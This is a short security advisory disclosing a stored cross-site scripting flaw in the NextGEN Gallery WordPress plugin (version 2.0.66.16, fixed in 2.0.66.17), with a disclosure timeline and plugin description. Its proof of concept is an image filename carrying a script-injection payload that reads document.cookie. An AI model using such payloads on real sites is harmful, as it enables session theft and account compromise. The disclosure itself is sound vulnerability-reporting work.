Plugin Name : NextGEN Gallery
 
Effected Version : 2.0.66.16 (and most probably lower version's if any)
 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Madhu Akula
 

 
Technical Details
 
Minimum Level of Access Required : Administrator
 
PoC - (Proof of Concept) :
 
http://localhost/wp-admin/admin.php?page=ngg_addgallery.php

Click on Image upload and give the image name as ("><img src=x onerror=prompt(document.cookie)>.png")


Video Demonstration :

http://www.youtube.com/watch?v=SzNopJUE3nk
 
Type of XSS : Stored
 
Fixed in : 2.0.66.17
 
http://wordpress.org/plugins/nextgen-gallery/changelog/
 
Disclosure Timeline
 
Vendor Contacted : 2014-08-02
 
Plugin Status : Updated on 2014-08-04
 
Public Disclosure : October 3, 2015
 
CVE Number : Not assigned yet
 
Plugin Description :
 
NextGEN Gallery is the most popular WordPress gallery plugin, and one of the most popular WordPress plugins of all time, with over 10 million downloads.

It provides a powerful engine for uploading and managing galleries of images, with the ability to batch upload, import meta data, add/delete/rearrange/sort images, edit thumbnails, group galleries into albums, and more. It also provides two front-end display styles (slideshows and thumbnail galleries), both of which come with a wide array of options for controlling size, style, timing, transitions, controls, lightbox effects, and more.